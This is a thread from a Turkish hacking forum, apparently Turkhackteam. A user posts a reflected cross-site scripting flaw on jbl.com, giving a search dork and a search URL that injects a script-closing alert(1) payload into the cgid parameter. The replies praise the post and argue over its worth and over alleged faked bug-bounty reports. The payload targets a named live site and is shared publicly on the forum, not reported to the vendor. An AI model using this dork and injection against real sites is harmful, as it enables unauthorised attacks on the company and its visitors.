JBL Reflected XSS Script Açığı $$

F

Floria1

Katılımcı Üye
25 May 2023
900
531

JBL'in Scriptinde bulduğum Reflected XSS Zaafiyeti;

Dork:
intext:© 2023 Harman International Industries, Incorporated. Todos los derechos reservados. site:jbl.com

-
Kod: 
/search?basketContents=&basketUrl=https://www.jbl.com/cart&cgid=https:support.jbl.comusen</script><script>alert(1)</script>

~

dkrphev.png

~

5sn6f18.png

~
df5h2px.png

~
s930i3w.png




BdExlJ.gif
 
Son düzenleme:
ExeOweR

ExeOweR

Anka Emektar
5 Mar 2012
3,377
994
exe.php
ByFelez' Alıntı:
Anlamlandıramadığım şey şu Dork ile Site bulup XSS tetiklemek yani anlam veremiyorum...

Biraz açıkların mantıklarına yönelseniz...

Emeğine sağlık
Genişletmek için tıkla ...
Pek böyle cevap vermem fakat sen XSS profesörü müsün?
Çok mantık aramak istiyorsan kişisel olarak girip payloadları deneyebilirdin ve konuya bambaşka bir bakış açısı yaratabilirdin.
Şu şöyle olsa bunu yapabilirdik, bu böyle olsa bu olabilirdi gibisinden fakat sen bunu istememişsin.

Arkadaşımız denemiş bulmuş bizlere göstermiş sen ise eleştiri olarak nitelendirsen bile bu bambaşka bir seviyede yorum olmuş.
Sen ve senin gibi bu şekilde düşünen herkese bu lafım.
Burada amaç paylaşmak değil mi ve burası "hack" forumu değil mi?
Anlamadığım bir çok şey var tabi bu sadece senin yorumun ile ilgili düşüncemdir.

Burada kim nedir necidir iyi biliniyor, timde bulunan arkadaşımız diye koruma amaçlı yazmıyorum bunu kim olsa aynı şekilde bu cevabı hatta fazlasını alırsın.
Ekstra olarak burada kimse kimseden üstün değildir.
Üstün olmak için bilgiden fazlası gerekir.
 
B

ByFelez

Uzman üye
9 Tem 2013
1,818
1,774
ExeOweR' Alıntı:
Pek böyle cevap vermem fakat sen XSS profesörü müsün?
Çok mantık aramak istiyorsan kişisel olarak girip payloadları deneyebilirdin ve konuya bambaşka bir bakış açısı yaratabilirdin.
Şu şöyle olsa bunu yapabilirdik, bu böyle olsa bu olabilirdi gibisinden fakat sen bunu istememişsin.

Arkadaşımız denemiş bulmuş bizlere göstermiş sen ise eleştiri olarak nitelendirsen bile bu bambaşka bir seviyede yorum olmuş.
Sen ve senin gibi bu şekilde düşünen herkese bu lafım.
Burada amaç paylaşmak değil mi ve burası "hack" forumu değil mi?
Anlamadığım bir çok şey var tabi bu sadece senin yorumun ile ilgili düşüncemdir.

Burada kim nedir necidir iyi biliniyor, timde bulunan arkadaşımız diye koruma amaçlı yazmıyorum bunu kim olsa aynı şekilde bu cevabı hatta fazlasını alırsın.
Ekstra olarak burada kimse kimseden üstün değildir.
Üstün olmak için bilgiden fazlası gerekir.
Genişletmek için tıkla ...
Öyle bi iddaam yok sakin ol :)
Kimin ne olduğunu biliyo olsalardı keşke :)
 
teux

teux

Katılımcı Üye
23 Ocak 2023
959
1,332
Floria1' Alıntı:

JBL'in Scriptinde bulduğum Reflected Xss Zaafiyeti;

Dork:
intext:© 2023 Harman International Industries, Incorporated. Todos los derechos reservados. site:jbl.com

-
Kod: 
/search?basketContents=&basketUrl=https://www.jbl.com/cart&cgid=https:support.jbl.comusen</script><script>alert(1)</script>

~

dkrphev.png

~

5sn6f18.png

~
df5h2px.png

~
s930i3w.png




BdExlJ.gif
Genişletmek için tıkla ...
Eline Sağlık canım.
ByFelez' Alıntı:
Anlamlandıramadığım şey şu Dork ile Site bulup XSS tetiklemek yani anlam veremiyorum...

Biraz açıkların mantıklarına yönelseniz...

Emeğine sağlık
Genişletmek için tıkla ...
hmm
 
Ares

Ares

Üye
1 Eyl 2006
85
337
ByFelez' Alıntı:
Öyle bi iddaam yok sakin ol :)
Kimin ne olduğunu biliyo olsalardı keşke :)
Genişletmek için tıkla ...
Kimin ne olduğunu biliyoruz ByFelez. Geçmişinde hall of fame kategorisine hackerone dan aldığın raporları öğeyi denetle ile açan kişilerden birisin.
Burada eleştiri yapacak bir seviyen olması için yalanlardan kaçın. Kendin ile yüzleş ondan sonra öğretici bir eleştiri yap.

Eline sağlık Floria
 
B

ByFelez

Uzman üye
9 Tem 2013
1,818
1,774
Ares' Alıntı:
Kimin ne olduğunu biliyoruz ByFelez. Geçmişinde hall of fame kategorisine hackerone dan aldığın raporları öğeyi denetle ile açan kişilerden birisin.
Burada eleştiri yapacak bir seviyen olması için yalanlardan kaçın. Kendin ile yüzleş ondan sonra öğretici bir eleştiri yap.

Eline sağlık Floria
Genişletmek için tıkla ...
Sizinle Burada tartışmaya girip mesaj kasmaya çalışmayacağım. Ögeyi denetle değil Etik Olmayan Yöntemlerle Devralınmış Raporlar. Sen Ögeyi Denetle De.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.